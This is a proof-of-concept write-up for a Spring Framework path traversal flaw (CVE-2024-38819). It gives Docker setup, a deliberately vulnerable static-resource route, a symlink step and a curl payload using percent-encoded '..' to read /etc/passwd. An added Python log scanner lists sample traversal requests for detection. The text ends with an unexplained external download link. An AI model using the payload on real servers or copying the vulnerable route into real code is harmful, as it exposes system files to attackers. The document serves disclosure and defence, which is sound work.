This is a proof of concept for CVE-2024-38819, a path traversal vulnerability in Spring Framework that I reported. It demonstrates how a percent-encoded `..` segment passed through a symbolic link under a functional static-resource route reads a file outside the served directory.
Execution Steps

1. Build the Docker image (Spring Boot 3.3.4, based on Spring Framework 6.1.13):

   cd vuln
   docker build -t cve-2024-38819-poc .

2. Run the container and expose port 8080 to the host machine:

   docker run -d -p 8080:8080 --name cve-2024-38819-poc cve-2024-38819-poc

3. Run the following command to execute the PoC and confirm the vulnerability:

   curl http://localhost:8080/static/link/%2e%2e/etc/passwd

If the attack is successful, the contents of the /etc/passwd file will be displayed.
Explanation

Create PathTraversalDemoApplication.java with the following code to set up static file routing using RouterFunction and FileSystemResource (the @Bean annotation that registers the router with Spring was not shown in the original snippet and is added here):

   @Bean
   public RouterFunction<ServerResponse> staticResourceRouter() {
       // Serves every request under /static/** directly from the filesystem directory /app/static/
       return RouterFunctions.resources("/static/**", new FileSystemResource("/app/static/"));
   }

Add the following command to the Dockerfile to create a symbolic link:

   RUN ln -s /static /app/static/link
Create a payload that leverages percent-encoding (%2e%2e for ..) to traverse directories through the symbolic link.

Path:

Use the following curl command to execute the PoC and verify whether the attack is successful:

   curl http://localhost:8080/static/link/%2e%2e/etc/passwd

If the attack is successful, the contents of the /etc/passwd file will be displayed.
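As an added defender-side example (not part of the original PoC), the following script scans access-log lines for requests like the one above. It assumes a common-log-style format and uses constructed sample lines; the key point it encodes is that lexical normalization is not a safe check here, because /static/link/.. normalizes to /static even though the symlink makes it resolve outside the served directory.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (assumed common-log format; not from the original page).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2025:10:00:00 +0000] "GET /static/link/%2e%2e/etc/passwd HTTP/1.1" 200 1234
10.0.0.6 - - [01/Jan/2025:10:00:01 +0000] "GET /static/css/site.css HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2025:10:00:02 +0000] "GET /static/link/..%2f..%2fetc/hosts HTTP/1.1" 404 0
10.0.0.8 - - [01/Jan/2025:10:00:03 +0000] "GET /static/%252e%252e/etc/passwd HTTP/1.1" 200 99
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


def fully_decode(path: str, rounds: int = 3) -> str:
    """Percent-decode until the string stops changing (bounded), so that
    double-encoded variants such as %252e are also seen as '.'."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def has_dotdot_segment(decoded_path: str) -> bool:
    """True if any '/'-separated segment is '..'. posixpath.normpath is
    deliberately NOT used: with a symlink in the tree, '/static/link/..'
    normalizes to '/static' yet resolves on disk to the symlink target's
    parent, which is exactly the CVE-2024-38819 case."""
    return any(seg == ".." for seg in decoded_path.split("/"))


def find_traversal_attempts(log_text: str, prefix: str = "/static/"):
    """Return (ip, raw_path) for requests under `prefix` whose decoded
    path contains a '..' segment."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        raw = m.group("path").split("?", 1)[0]  # drop any query string
        decoded = fully_decode(raw)
        if decoded.startswith(prefix) and has_dotdot_segment(decoded):
            hits.append((m.group("ip"), raw))
    return hits


if __name__ == "__main__":
    for ip, path in find_traversal_attempts(SAMPLE_LOG):
        print(f"traversal attempt from {ip}: {path}")
```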
Disclaimer
link:https://pan.baidu.com/s/1Z0t9TpTPSjpXPEJ6sRIznA?pwd=weew